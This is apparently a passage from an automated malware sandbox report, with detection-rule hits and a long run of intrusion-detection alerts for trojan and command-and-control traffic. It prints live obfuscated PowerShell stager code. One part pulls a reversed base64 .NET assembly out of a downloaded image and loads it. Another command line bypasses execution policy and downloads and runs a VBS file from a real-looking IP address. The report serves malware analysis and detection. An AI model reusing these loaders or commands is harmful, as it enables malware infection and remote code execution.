UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Temp\4m2igvns.wzt.ps1

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", ProcessId: 3772, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:45:24.692922+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249164TCP
        2024-10-24T08:45:27.389909+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249166TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:45:24.692895+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.176.14180TCP
        2024-10-24T08:45:27.389849+020020244491Attempted User Privilege Gain192.168.2.2249166192.3.176.14180TCP
        2024-10-24T08:45:46.719121+020020244491Attempted User Privilege Gain192.168.2.2249174192.3.176.14180TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:08.436934+020020243121A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
        2024-10-24T08:46:09.533913+020020243121A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:07.501003+020020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
        2024-10-24T08:46:08.603129+020020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
        2024-10-24T08:46:09.653987+020020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
        2024-10-24T08:46:10.793925+020020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
        2024-10-24T08:46:11.962080+020020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
        2024-10-24T08:46:13.263396+020020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
        2024-10-24T08:46:14.530065+020020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
        2024-10-24T08:46:15.797609+020020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
        2024-10-24T08:46:17.256132+020020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
        2024-10-24T08:46:18.375546+020020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
        2024-10-24T08:46:19.648513+020020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
        2024-10-24T08:46:20.762214+020020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
        2024-10-24T08:46:21.849543+020020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
        2024-10-24T08:46:23.281189+020020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
        2024-10-24T08:46:24.390800+020020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
        2024-10-24T08:46:25.483247+020020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
        2024-10-24T08:46:26.725660+020020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
        2024-10-24T08:46:28.399061+020020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
        2024-10-24T08:46:29.683232+020020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
        2024-10-24T08:46:30.898100+020020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
        2024-10-24T08:46:32.194843+020020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
        2024-10-24T08:46:33.628718+020020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
        2024-10-24T08:46:34.733384+020020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
        2024-10-24T08:46:35.832085+020020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
        2024-10-24T08:46:37.014681+020020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
        2024-10-24T08:46:38.149338+020020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
        2024-10-24T08:46:39.259709+020020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
        2024-10-24T08:46:40.378743+020020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
        2024-10-24T08:46:41.479514+020020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
        2024-10-24T08:46:42.564513+020020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
        2024-10-24T08:46:43.679806+020020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
        2024-10-24T08:46:45.035157+020020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
        2024-10-24T08:46:46.148100+020020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
        2024-10-24T08:46:47.878298+020020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
        2024-10-24T08:46:49.169376+020020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
        2024-10-24T08:46:50.273713+020020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
        2024-10-24T08:46:51.369260+020020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
        2024-10-24T08:46:52.485586+020020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
        2024-10-24T08:46:53.624164+020020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
        2024-10-24T08:46:54.754980+020020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
        2024-10-24T08:46:55.935933+020020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
        2024-10-24T08:46:57.102699+020020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
        2024-10-24T08:46:58.242857+020020253811Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
        2024-10-24T08:46:59.354586+020020253811Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
        2024-10-24T08:47:00.514142+020020253811Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
        2024-10-24T08:47:02.970814+020020253811Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
        2024-10-24T08:47:04.071738+020020253811Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
        2024-10-24T08:47:05.171077+020020253811Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
        2024-10-24T08:47:06.288133+020020253811Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
        2024-10-24T08:47:07.393228+020020253811Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
        2024-10-24T08:47:08.518293+020020253811Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
        2024-10-24T08:47:09.627438+020020253811Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
        2024-10-24T08:47:10.737748+020020253811Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
        2024-10-24T08:47:11.855700+020020253811Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
        2024-10-24T08:47:12.955608+020020253811Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
        2024-10-24T08:47:14.230832+020020253811Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
        2024-10-24T08:47:15.332422+020020253811Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
        2024-10-24T08:47:16.428303+020020253811Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
        2024-10-24T08:47:17.547052+020020253811Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
        2024-10-24T08:47:18.627837+020020253811Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
        2024-10-24T08:47:19.754722+020020253811Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
        2024-10-24T08:47:20.851688+020020253811Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
        2024-10-24T08:47:22.015332+020020253811Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
        2024-10-24T08:47:23.119040+020020253811Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
        2024-10-24T08:47:24.247331+020020253811Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
        2024-10-24T08:47:25.347820+020020253811Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
        2024-10-24T08:47:26.454873+020020253811Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
        2024-10-24T08:47:27.639729+020020253811Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
        2024-10-24T08:47:28.744434+020020253811Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
        2024-10-24T08:47:29.996929+020020253811Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
        2024-10-24T08:47:31.153128+020020253811Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
        2024-10-24T08:47:32.364981+020020253811Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
        2024-10-24T08:47:33.527794+020020253811Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
        2024-10-24T08:47:34.612892+020020253811Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
        2024-10-24T08:47:36.386309+020020253811Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
        2024-10-24T08:47:37.498724+020020253811Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
        2024-10-24T08:47:38.645072+020020253811Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
        2024-10-24T08:47:39.740085+020020253811Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:10.621545+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249180TCP
        2024-10-24T08:46:11.766708+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249181TCP
        2024-10-24T08:46:13.019152+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249182TCP
        2024-10-24T08:46:14.281509+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249183TCP
        2024-10-24T08:46:15.615823+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249184TCP
        2024-10-24T08:46:17.050862+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249185TCP
        2024-10-24T08:46:18.222022+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249186TCP
        2024-10-24T08:46:19.339622+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249188TCP
        2024-10-24T08:46:20.611001+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249189TCP
        2024-10-24T08:46:21.715929+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249190TCP
        2024-10-24T08:46:22.814634+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249191TCP
        2024-10-24T08:46:24.252638+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249192TCP
        2024-10-24T08:46:25.337740+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249193TCP
        2024-10-24T08:46:26.557171+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249194TCP
        2024-10-24T08:46:28.252264+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249195TCP
        2024-10-24T08:46:29.343879+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249196TCP
        2024-10-24T08:46:30.661678+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249197TCP
        2024-10-24T08:46:31.862466+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249198TCP
        2024-10-24T08:46:33.161034+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249199TCP
        2024-10-24T08:46:34.584074+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249200TCP
        2024-10-24T08:46:35.682118+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249201TCP
        2024-10-24T08:46:36.789327+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249202TCP
        2024-10-24T08:46:37.972584+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249203TCP
        2024-10-24T08:46:39.120439+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249204TCP
        2024-10-24T08:46:40.229358+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249205TCP
        2024-10-24T08:46:41.334498+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249206TCP
        2024-10-24T08:46:42.430538+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249207TCP
        2024-10-24T08:46:43.529969+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249208TCP
        2024-10-24T08:46:44.670152+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249209TCP
        2024-10-24T08:46:45.990113+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249210TCP
        2024-10-24T08:46:47.113297+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249211TCP
        2024-10-24T08:46:48.816601+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249212TCP
        2024-10-24T08:46:50.135743+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249213TCP
        2024-10-24T08:46:51.220336+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249214TCP
        2024-10-24T08:46:52.330270+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249215TCP
        2024-10-24T08:46:53.458287+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249216TCP
        2024-10-24T08:46:54.562435+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249217TCP
        2024-10-24T08:46:55.739134+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249218TCP
        2024-10-24T08:46:56.921372+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249219TCP
        2024-10-24T08:46:58.078596+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249220TCP
        2024-10-24T08:46:59.204710+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249221TCP
        2024-10-24T08:47:00.305973+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249222TCP
        2024-10-24T08:47:01.472717+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249223TCP
        2024-10-24T08:47:03.917655+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249224TCP
        2024-10-24T08:47:05.022620+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249225TCP
        2024-10-24T08:47:06.133237+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249226TCP
        2024-10-24T08:47:07.249824+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249227TCP
        2024-10-24T08:47:08.358221+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249228TCP
        2024-10-24T08:47:09.479147+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249229TCP
        2024-10-24T08:47:10.580452+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249230TCP
        2024-10-24T08:47:11.701224+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249231TCP
        2024-10-24T08:47:12.804788+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249232TCP
        2024-10-24T08:47:14.038314+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249233TCP
        2024-10-24T08:47:15.188153+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249234TCP
        2024-10-24T08:47:16.278079+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249235TCP
        2024-10-24T08:47:17.389330+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249236TCP
        2024-10-24T08:47:18.480750+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249237TCP
        2024-10-24T08:47:19.581057+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249238TCP
        2024-10-24T08:47:20.708039+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249239TCP
        2024-10-24T08:47:21.804175+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249240TCP
        2024-10-24T08:47:22.972650+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249241TCP
        2024-10-24T08:47:24.087813+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249242TCP
        2024-10-24T08:47:25.198524+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249243TCP
        2024-10-24T08:47:26.310070+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249244TCP
        2024-10-24T08:47:27.427377+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249245TCP
        2024-10-24T08:47:28.606339+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249246TCP
        2024-10-24T08:47:29.699203+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249247TCP
        2024-10-24T08:47:30.950973+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249248TCP
        2024-10-24T08:47:32.223424+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249249TCP
        2024-10-24T08:47:33.322651+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249250TCP
        2024-10-24T08:47:34.472518+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249251TCP
        2024-10-24T08:47:36.171800+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249252TCP
        2024-10-24T08:47:37.356119+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249253TCP
        2024-10-24T08:47:38.486944+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249254TCP
        2024-10-24T08:47:39.597242+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249255TCP
        2024-10-24T08:47:40.700210+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249256TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T08:46:10.615957+020020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
        2024-10-24T08:46:11.760826+020020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
        2024-10-24T08:46:13.013301+020020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
        2024-10-24T08:46:14.275753+020020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
        2024-10-24T08:46:15.610265+020020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
        2024-10-24T08:46:17.050811+020020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
        2024-10-24T08:46:18.216510+020020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
        2024-10-24T08:46:19.333801+020020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
        2024-10-24T08:46:20.604827+020020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
        2024-10-24T08:46:21.710093+020020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
        2024-10-24T08:46:22.808952+020020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
        2024-10-24T08:46:24.246938+020020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
        2024-10-24T08:46:25.331525+020020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
        2024-10-24T08:46:26.551291+020020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
        2024-10-24T08:46:28.251730+020020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
        2024-10-24T08:46:29.338163+020020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
        2024-10-24T08:46:30.655966+020020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
        2024-10-24T08:46:31.856886+020020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
        2024-10-24T08:46:33.155234+020020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
        2024-10-24T08:46:34.578342+020020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
        2024-10-24T08:46:35.676631+020020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
        2024-10-24T08:46:36.783619+020020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
        2024-10-24T08:46:37.966886+020020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
        2024-10-24T08:46:39.114628+020020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
        2024-10-24T08:46:40.223656+020020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
        2024-10-24T08:46:41.328860+020020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
        2024-10-24T08:46:42.424772+020020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
        2024-10-24T08:46:43.523331+020020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
        2024-10-24T08:46:44.664054+020020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
        2024-10-24T08:46:45.984133+020020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
        2024-10-24T08:46:47.107551+020020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
        2024-10-24T08:46:48.810873+020020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
        2024-10-24T08:46:50.129192+020020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
        2024-10-24T08:46:51.214727+020020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
        2024-10-24T08:46:52.324683+020020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
        2024-10-24T08:46:53.452603+020020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
        2024-10-24T08:46:54.556519+020020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
        2024-10-24T08:46:55.732586+020020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
        2024-10-24T08:46:56.915668+020020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
        2024-10-24T08:46:58.072935+020020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
        2024-10-24T08:46:59.198997+020020243131Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
        2024-10-24T08:47:00.299934+020020243131Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
        2024-10-24T08:47:01.467081+020020243131Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
        2024-10-24T08:47:03.911969+020020243131Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
        2024-10-24T08:47:05.015239+020020243131Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
        2024-10-24T08:47:06.127566+020020243131Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
        2024-10-24T08:47:07.235602+020020243131Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
        2024-10-24T08:47:08.350903+020020243131Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
        2024-10-24T08:47:09.473326+020020243131Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
        2024-10-24T08:47:10.574642+020020243131Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
        2024-10-24T08:47:11.695700+020020243131Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
        2024-10-24T08:47:12.799153+020020243131Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
        2024-10-24T08:47:14.031658+020020243131Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
        2024-10-24T08:47:15.182608+020020243131Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
        2024-10-24T08:47:16.271864+020020243131Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
        2024-10-24T08:47:17.383378+020020243131Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
        2024-10-24T08:47:18.474819+020020243131Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
        2024-10-24T08:47:19.574207+020020243131Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
        2024-10-24T08:47:20.702266+020020243131Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
        2024-10-24T08:47:21.798439+020020243131Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
        2024-10-24T08:47:22.966218+020020243131Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
        2024-10-24T08:47:24.081988+020020243131Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
